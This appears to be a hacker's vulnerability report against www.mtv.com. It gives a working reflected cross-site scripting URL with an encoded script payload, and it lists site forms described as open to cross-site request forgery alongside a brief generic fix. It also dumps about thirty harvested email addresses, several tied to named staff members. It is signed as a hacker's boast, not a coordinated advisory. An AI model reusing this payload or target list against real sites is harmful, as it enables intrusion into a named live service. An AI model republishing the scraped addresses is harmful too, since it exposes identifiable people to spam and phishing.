report4:mtv.com

1. **********************************************************************************************
2. Target: www.mtv.com
3.  
4. [**] XSS:
5.  
6. http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&thisUrl=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20on%20MTV%20website%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
7.  
8. "work only on mozila firefox"
9.  
10. [**] Cross-site Request Forgery:
11.  
12. Cross-site Request Forgery (CSRF) is a type of attack whereby unauthorized commands are transmitted from a user that the application trusts. Unlike Cross-site Scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.
13.  
14. solution: Url and Forms that perform important operations must be protected by random tokens (hidden nonce values). These tokens must be checked for validity at the server before the request is processed.
15.  
16. url: http://www.mtv.com/artists/bridgit-mendler/
17.  
18. form: <form method="POST" action="http://www.mtv.com/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
19.  
20. url: http://www.mtv.com/mobile/
21.  
22. form: <form method="POST" action="http://www.mtv.com/mobile/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
23.  
24. url: http://www.mtv.com/mobile/faqs/
25.  
26. form: <form method="POST" action="http://www.mtv.com/mobile/faqs/" enctype="application/x-www-form-urlencoded" autocomplete="on"> ... </form>
27.  
28. url: http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?thisUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml&footprintUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Findex.jhtml
29.  
30. form: <form method="POST" action="http://www.mtv.com/sitewide/droplets/sectionsetupFiles/personalizationJS.jhtml?thisUrl=%2Fshared%2Fmovies%2Fflickd%2Fw%2Fwe_are_marshall_061207%2Finde...
31.  
32.  
33. [**]Email Disclosure'
34.  
35.  
36. email: josh.wigler@viacommix.com
37.  
38. email: webmaster@mtv.com
39.  
40. email: copyright@mtvn.com
41.  
42. email: privacy-admin@mtv.com
43.  
44. email: vmnsupport@adconductor.com
45.  
46. email: tribes.advertising@mtvn.com
47.  
48. email: buzzworthy@mtv.com
49.  
50. email: 16andPregnantcasting@mtvnmix.com
51.  
52. email: madecasting@mtv.com
53.  
54. email: MadeCasting@mtv.com
55.  
56. email: casting@triplethreattv.com
57.  
58. email: myowntruelife@gmail.com
59.  
60. email: cantafford@miscmedia.tv
61.  
62. email: casting@gigantic.tv
63.  
64. email: gender@mtvn.com
65.  
66. email: MTVInfertile@mtv.com
67.  
68. email: TLSiblings@gmail.com
69.  
70. email: tldrunkorexia@gmail.com
71.  
72. email: casting@punchedinthehead.com
73.  
74. email: trustparents@lintonmedia.com
75.  
76. email: eotwcasting@gmail.com
77.  
78. email: TLDetroitRising@gmail.com
79.  
80. email: casting@standardarts.com
81.  
82. email: truelifecasting@banditofilms.com
83.  
84. email: mtvsocialanxiety@gmail.com
85.  
86. email: casting@asylument.com
87.  
88. email: whipped@mtvn.com
89.  
90. email: jocelyn.vena@viacommix.com
91.  
92. email: kevinp.sullivan@viacommix.com
93.  
94. email: james.montgomery@mtvstaff.com
95.  
96. email: robert.markman@mtvstaff.com
97.  
98. email: nadeska.alexis@viacommix.com
99.  
100. email: kara.warner@mtvstaff.com
101.  
102.  
103. Picture of XSS vuln: http://www.imagup.com/data/1166124931.html
104.  
105. Human mind cracker